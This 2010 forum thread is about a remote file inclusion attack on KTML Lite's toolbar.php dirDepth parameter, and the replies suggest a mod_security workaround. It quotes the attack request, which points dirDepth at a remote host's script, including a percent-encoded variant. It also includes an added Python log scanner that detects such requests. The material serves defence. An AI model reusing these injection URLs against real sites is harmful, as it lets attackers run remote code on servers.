toolbar.php and index.php dirDepth - hostile injection

glensbo
Posts: 6
Joined: 2010-07-15 17:03

toolbar.php and index.php dirDepth - hostile injection

Post by glensbo » 2010-07-15 17:11

Have any of you seen any solution to this problem:
The problem arises from the following attack: /ktmlliterf/includes/ktedit/toolbar.php?dirDepth=http://h1.ripway.com/namybox2/mass.txt? HTTP/1.1" 200 11213 "http://www.xxxx.xx/ktmlliterf/includes/ ... 2/mass.txt?" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
It seems as if you are able to place phishing code via the two files in ktml.
Have a look at the following sites:
http://www.linuxquestions.org/questions ... te-652308/
http://www.placeoweb.com/hack/php/
http://www.securityfocus.com/archive/1/494138
http://www.mail-archive.com/bugtraq@sec ... 27840.html

Could anybody help in finding ways around this security problem?
Regards, Henri

Fred
Site Admin
Posts: 491
Joined: 2010-02-15 12:10
Location: Armagh, Northern Ireland

Re: toolbar.php and index.php dirDepth - hostile injection

Post by Fred » 2010-07-16 20:38

Hi Henri,
Haven't used ktml lite in ages so I can't really comment on it.
How about asking your host to set a mod_sec rule to check for the problem and block it when it happens.
I am sure (might be totally wrong) that the toolbar.php file will never be used with an HTTP parameter, so it should be easy enough to check for such an event.
If it is used with an HTTP parameter, you can check that the domain is the same as where the script is running from. You will definitely not include a file from a remote domain in that manner.

Coding mod_sec rules is not my forte, so it will be best to ask your host for assistance.

glensbo
Posts: 6
Joined: 2010-07-15 17:03

Re: toolbar.php and index.php dirDepth - hostile injection

Post by glensbo » 2010-07-24 15:45

Thanks for your reply. I will delete the two files and see if it has any effect.

Fred
Site Admin
Posts: 491
Joined: 2010-02-15 12:10
Location: Armagh, Northern Ireland

Re: toolbar.php and index.php dirDepth - hostile injection

Post by Fred » 2010-07-26 17:28

What two files do you want to delete?
Deleting toolbar.php will break the script.

What you need to do is check that no-one is calling an external script via the file.

/ktedit/toolbar.php?dirDepth=http://h1.ripway.com/namybox2/mass.txt

In this line h1.ripway is not on your site, so write a mod_sec rule checking for specifically that and block the IP address if it does occur.
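The check Fred describes in his two replies (a dirDepth value must not point at a file on another domain, and any client that sends one should be blocked), written out as an added example. It is not code from KTML Lite or from anyone in the thread, and it is Python rather than a ModSecurity rule so that it can be run offline over an access log. The site hostname www.xxxx.xx is lifted from the log line Henri posted and used as a placeholder; the sample log lines are constructed (the first request target is the one Henri quoted, the client IPs, timestamps and remaining lines are invented for the example).

```python
"""Spot remote-file-inclusion attempts against KTML Lite's dirDepth parameter.

Added example for this thread, not code from KTML Lite or from the posters.
It implements the check Fred describes (dirDepth must not point at a file on
another domain) so it can be run over an access log. SITE_HOST is assumed.
"""
import re
from typing import Optional
from urllib.parse import unquote, urlsplit

# Hypothetical: the hostname the vulnerable site is served under.
SITE_HOST = "www.xxxx.xx"

# After decoding, a leading scheme ("http:", "ftp:", "php:", "data:", ...) means
# PHP's include() would open a stream wrapper instead of a directory on disk.
SCHEME_RE = re.compile(r"^([a-z][a-z0-9+.-]*):", re.IGNORECASE)

# Apache combined log format; the request target is captured raw (still encoded).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)


def decode_param(value: str) -> str:
    """Percent-decode twice so %68ttp:// and %2568ttp:// both surface as http://."""
    return unquote(unquote(value))


def is_hostile_dirdepth(value: str, site_host: str = SITE_HOST) -> bool:
    """True when dirDepth would make include() fetch something remote.

    A relative path ("../../") passes. An http(s) URL passes only if its host is
    the site itself, the one exception Fred allows. Anything else carrying a
    scheme (ftp://, php://, data:, ...) is treated as an attack.
    """
    decoded = decode_param(value).strip()
    match = SCHEME_RE.match(decoded)
    if not match:
        return False
    scheme = match.group(1).lower()
    if scheme in ("http", "https"):
        try:
            # hostname drops userinfo, so "http://www.xxxx.xx@evil/" is judged
            # by "evil", not by the decoy in front of the "@".
            host = (urlsplit(decoded).hostname or "").lower()
        except ValueError:
            return True  # unparseable netloc: fail closed
        return host != site_host.lower()
    return True


def dirdepth_from_request(target: str) -> Optional[str]:
    """Return the raw (undecoded) dirDepth value from a request target, if any."""
    for pair in urlsplit(target).query.split("&"):
        key, _, raw = pair.partition("=")
        if unquote(key) == "dirDepth":
            return raw
    return None


def scan_access_log(lines, site_host: str = SITE_HOST):
    """Return one record per log line whose dirDepth fails is_hostile_dirdepth."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        raw = dirdepth_from_request(m["target"])
        if raw is None or not is_hostile_dirdepth(raw, site_host):
            continue
        # A 200 with a sizeable body shows toolbar.php answered, not that the
        # remote file ran; the host still needs checking for dropped files.
        hits.append({
            "ip": m["ip"],
            "value": decode_param(raw),
            "status": int(m["status"]),
            "size": int(m["size"]) if m["size"].isdigit() else 0,
        })
    return hits


# Constructed sample log: the first request target is the one Henri quoted; the
# client IPs, timestamps and the other three requests are made up.
SAMPLE_LOG = [
    '203.0.113.7 - - [15/Jul/2010:16:58:02 +0200] "GET /ktmlliterf/includes/ktedit/toolbar.php?dirDepth=http://h1.ripway.com/namybox2/mass.txt? HTTP/1.1" 200 11213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"',
    # Same attack with the scheme percent-encoded to dodge a literal "http://" filter.
    '203.0.113.7 - - [15/Jul/2010:16:58:05 +0200] "GET /ktmlliterf/includes/ktedit/toolbar.php?dirDepth=%68%74%74%70://h1.ripway.com/namybox2/mass.txt%3F HTTP/1.1" 200 11213 "-" "Mozilla/5.0"',
    # Legitimate editor use: a relative directory prefix.
    '198.51.100.4 - - [15/Jul/2010:17:02:44 +0200] "GET /ktmlliterf/includes/ktedit/toolbar.php?dirDepth=../../ HTTP/1.1" 200 11213 "-" "Mozilla/5.0"',
    # Same-host absolute URL, which Fred's rule lets through.
    '198.51.100.4 - - [15/Jul/2010:17:03:10 +0200] "GET /ktmlliterf/includes/ktedit/toolbar.php?dirDepth=http://www.xxxx.xx/ktmlliterf/ HTTP/1.1" 200 11213 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(f'{hit["ip"]} -> {hit["value"]} (HTTP {hit["status"]}, {hit["size"]} bytes)')
```

Point it at the real log by replacing SAMPLE_LOG with the file's lines; the IPs in the hits are the ones to block. Two caveats carry over to a ModSecurity rule on ARGS:dirDepth: the engine decodes the query string once, so the rule needs t:urlDecodeUni (and t:lowercase) before matching a leading scheme, or the %68ttp variant walks past a literal "http://" check; and the 200 in Henri's log only shows toolbar.php responded, so the server should still be searched for files the fetched script may have written.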

glensbo
Posts: 6
Joined: 2010-07-15 17:03

Re: toolbar.php and index.php dirDepth - hostile injection

Post by glensbo » 2010-08-27 10:36

Fred wrote:What two files do you want to delete?
Deleting toolbar.php will break the script.

What you need to do is check that no-one is calling an external script via the file.

/ktedit/toolbar.php?dirDepth=http://h1.ripway.com/namybox2/mass.txt

In this line h1.ripway is not on your site, so write a mod_sec rule checking for specifically that and block the IP address if it does occur.

Thanks for your help, as it was what I experienced, so I will write the workaround as you have outlined. Thanks again.

Fred
Site Admin
Posts: 491
Joined: 2010-02-15 12:10
Location: Armagh, Northern Ireland

Re: toolbar.php and index.php dirDepth - hostile injection

Post by Fred » 2010-08-27 11:17

Glad you solved your problem.

Could you post the rule that you created?
It might be useful for someone else as well.
